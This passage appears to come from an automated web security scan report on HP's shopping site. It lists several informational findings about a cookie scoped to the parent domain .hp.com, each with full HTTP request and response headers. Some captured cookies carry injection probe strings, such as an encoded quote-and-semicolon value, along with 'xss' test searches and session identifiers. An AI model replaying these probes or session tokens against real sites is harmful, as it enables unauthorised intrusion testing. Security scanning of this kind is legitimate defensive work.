X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.4. http://www.shopping.hp.com/desktops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.5. http://www.shopping.hp.com/esp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.6. http://www.shopping.hp.com/go/microsoftoffers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/microsoftoffers

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/3/dt_promo_tile3_buy_a_pc_and_get_an_xbox_526 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fgo%25252Fmicrosoftoffers_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252Fpromo_tile%25252F3%25252Fdt_promo_tile3_buy_a__1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.7. http://www.shopping.hp.com/go/touchpadfaqs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/touchpadfaqs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlktjNuS3QxxMC3vvlfcdgKY0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=1x1x4

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkti9uU0Ql8NyDuvVDYcwSc0ic%3D; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 129613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

3.8. http://www.shopping.hp.com/printer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

3.9. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (domain=.hp.com, set by www.shopping.hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:07:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqjt2W2A5xOi3rslfedwOX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:07:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224469

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

3.10. http://www.shopping.hp.com/supplies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkij96W2w9%2FOi%2Frv1TZdg3Tng%3D%3D; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

3.11. http://www.shopping.hp.com/webapp/shopping/can.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: hpcompc_usen (Domain=.hp.com, issued by www.shopping.hp.com, so it is sent to every host under hp.com). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; 